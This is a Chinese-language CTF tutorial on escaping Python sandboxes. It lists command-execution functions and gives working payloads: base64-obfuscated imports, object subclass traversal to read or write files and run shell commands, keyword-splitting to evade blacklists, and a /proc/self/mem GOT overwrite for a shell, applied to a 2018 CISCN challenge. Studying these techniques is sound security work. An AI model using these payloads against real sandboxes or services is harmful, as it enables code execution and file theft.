Python 沙盒¶
所謂的 Python 沙盒,即以一定的方法模擬 Python 終端,實現用戶對 Python 的使用。
Python 沙箱逃逸的一些方法¶
我們通常所說的 Python 沙箱逃逸就是繞過模擬的 Python 終端,最終實現命令執行。
導入模塊¶
在 Python 的內建函數中,有一些函數可以幫助我們實現任意命令執行:
os.system() os.popen()
commands.getstatusoutput() commands.getoutput()
commands.getstatus()
subprocess.call(command, shell=True) subprocess.Popen(command, shell=True)
pty.spawn()
import xxx
from xxx import *
__import__('xxx')
我們可以通過上述的導入方法,導入相關模塊並使用上述的函數實現命令執行。 除此之外,我們也可以通過路徑引入模塊: 如在 linux 系統中 Python 的 os 模塊的路徑一般都是在 /usr/lib/python2.7/os.py
,當知道路徑的時候,我們就可以通過如下的操作導入模塊,然後進一步使用相關函數。
>>> import sys
>>> sys.modules['os']='/usr/lib/python2.7/os.py'
>>> import os
>>>
>>> execfile('/usr/lib/python2.7/os.py')
>>> system('cat /etc/passwd')
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...
>>> getcwd()
'/usr/lib/python2.7'
import timeit
timeit.timeit("__import__('os').system('dir')",number=1)
** exec 和 eval 比較經典了 eval('__import__("os").system("dir")')
import platform
print platform.popen('dir').read()
但是,正常的 Python 沙箱會以黑名單的形式禁止使用一些模塊如 os 或以白名單的形式只允許用戶使用沙箱提供的模塊,用以阻止用戶的危險操作。而如何進一步逃逸沙箱就是我們的重點研究內容。
Python 的內建函數¶
當我們不能導入模塊,或者想要導入的模塊被禁,那麼我們只能尋求 Python 本身內置函數(即通常不用人爲導入,Python 本身默認已經導入的函數)。我們可以通過可以通過 dir __builtin__
來獲取內置函數列表
>>> dir(__builtins__)
['ArithmeticError', 'AssertionError', 'AttributeError', 'BaseException', 'BufferError', 'BytesWarning', 'DeprecationWarning', 'EOFError', 'Ellipsis', 'EnvironmentError', 'Exception', 'False', 'FloatingPointError', 'FutureWarning', 'GeneratorExit', 'IOError', 'ImportError', 'ImportWarning', 'IndentationError', 'IndexError', 'KeyError', 'KeyboardInterrupt', 'LookupError', 'MemoryError', 'NameError', 'None', 'NotImplemented', 'NotImplementedError', 'OSError', 'OverflowError', 'PendingDeprecationWarning', 'ReferenceError', 'RuntimeError', 'RuntimeWarning', 'StandardError', 'StopIteration', 'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit', 'TabError', 'True', 'TypeError', 'UnboundLocalError', 'UnicodeDecodeError', 'UnicodeEncodeError', 'UnicodeError', 'UnicodeTranslateError', 'UnicodeWarning', 'UserWarning', 'ValueError', 'Warning', 'ZeroDivisionError', '_', '__debug__', '__doc__', '__import__', '__name__', '__package__', 'abs', 'all', 'any', 'apply', 'basestring', 'bin', 'bool', 'buffer', 'bytearray', 'bytes', 'callable', 'chr', 'classmethod', 'cmp', 'coerce', 'compile', 'complex', 'copyright', 'credits', 'delattr', 'dict', 'dir', 'divmod', 'enumerate', 'eval', 'execfile', 'exit', 'file', 'filter', 'float', 'format', 'frozenset', 'getattr', 'globals', 'hasattr', 'hash', 'help', 'hex', 'id', 'input', 'int', 'intern', 'isinstance', 'issubclass', 'iter', 'len', 'license', 'list', 'locals', 'long', 'map', 'max', 'memoryview', 'min', 'next', 'object', 'oct', 'open', 'ord', 'pow', 'print', 'property', 'quit', 'range', 'raw_input', 'reduce', 'reload', 'repr', 'reversed', 'round', 'set', 'setattr', 'slice', 'sorted', 'staticmethod', 'str', 'sum', 'super', 'tuple', 'type', 'unichr', 'unicode', 'vars', 'xrange', 'zip']
繞過實例: 首先通過 base64 繞過字符明文檢測
>>> import base64
>>> base64.b64encode('__import__')
'X19pbXBvcnRfXw=='
>>> base64.b64encode('os')
'b3M='
>>> __builtins__.__dict__['X19pbXBvcnRfXw=='.decode('base64')]('b3M='.decode('base64'))
如果一些 內斂函數在 builtins 刪除 ,我們可以通過 reload(builtins) 重新載入獲取一個完整的 builtins
創建對象以及引用¶
Python 的 object 類中集成了很多的基礎函數,我們想要調用的時候也是可以通過創建對象進而引用。
我們有常見的兩個方法:
().__class__.__bases__[0]
''.__class__.__mro__[2]
print ().__class__.__bases__[0].__subclasses__()[40]("/etc/services").read()
達到文件讀取的效果, 常見payload
#讀文件
().__class__.__bases__[0].__subclasses__()[40](r'C:\1.php').read()
#寫文件
().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123')
#執行任意命令
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /var/www/html").read()' )
間接引用¶
在有些題目中,如這次的2018年國賽的 Python 沙盒題目上,import 其實整個是被閹割了。但是在 Python 中,原生的 import 是存在被引用的,只要我們找到相關對象引用就可以進一步獲取我們想要的內容,具體下面的demo會講述到
write修改got表¶
實際上是一個 /proc/self/mem 的內存操作方法 /proc/self/mem 是內存鏡像,能夠通過它來讀寫到進程的所有內存,包括可執行代碼,如果我們能獲取到Python一些函數的偏移,如 system ,我們便可以通過覆寫 got 表達到 getshell的目的。
(lambda r,w:r.seek(0x08de2b8) or w.seek(0x08de8c8) or w.write(r.read(8)) or ().__class__.__bases__[0].__subclasses__()[40]('c'+'at /home/ctf/5c72a1d444cf3121a5d25f2db4147ebb'))(().__class__.__bases__[0].__subclasses__()[40]('/proc/self/mem','r'),().__class__.__bases__[0].__subclasses__()[40]('/proc/self/mem', 'w', 0))
例子¶
2018 ciscn 全國大學生信息安全競賽中的 Python 沙箱逃逸。 我們可以通過print ().__class__.__bases__[0].__subclasses__()[40]("/home/ctf/sandbox.py").read()
獲取題目源碼,然後可以進一步分析,以下提供三種逃逸方法。
創建對象並利用 Python 操作字符串的特性¶
x = [x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'ca'+'tch_warnings'][0].__init__
x.__getattribute__("func_global"+"s")['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('l'+'s')
x.__getattribute__("func_global"+"s")['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('l'+'s /home/ctf')
x.__getattribute__("func_global"+"s")['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ca'+'t /home/ctf/5c72a1d444cf3121a5d25f2db4147ebb')
劫持 got 表 getshell¶
(lambda r,w:r.seek(0x08de2b8) or w.seek(0x08de8c8) or w.write(r.read(8)) or ().__class__.__bases__[0].__subclasses__()[40]('l'+'s /home/ctf/'))(().__class__.__bases__[0].__subclasses__()[40]('/proc/self/mem','r'),().__class__.__bases__[0].__subclasses__()[40]('/proc/self/mem', 'w', 0))
(lambda r,w:r.seek(0x08de2b8) or w.seek(0x08de8c8) or w.write(r.read(8)) or ().__class__.__bases__[0].__subclasses__()[40]('c'+'at /home/ctf/5c72a1d444cf3121a5d25f2db4147ebb'))(().__class__.__bases__[0].__subclasses__()[40]('/proc/self/mem','r'),().__class__.__bases__[0].__subclasses__()[40]('/proc/self/mem', 'w', 0))
尋找 import 的間接引用¶
在不斷的 dir 過程中,發現 closure 這個 object 保存了參數,可以引用原生的 import
print __import__.__getattribute__('__clo'+'sure__')[0].cell_contents('o'+'s').__getattribute__('sy'+'stem')('l'+'s home')
參考¶
https://xz.aliyun.com/t/52#toc-10 https://blog.csdn.net/qq_35078631/article/details/78504415 https://www.anquanke.com/post/id/85571 http://bestwing.me/2018/05/03/awesome-python-sandbox-in-ciscn/#0x01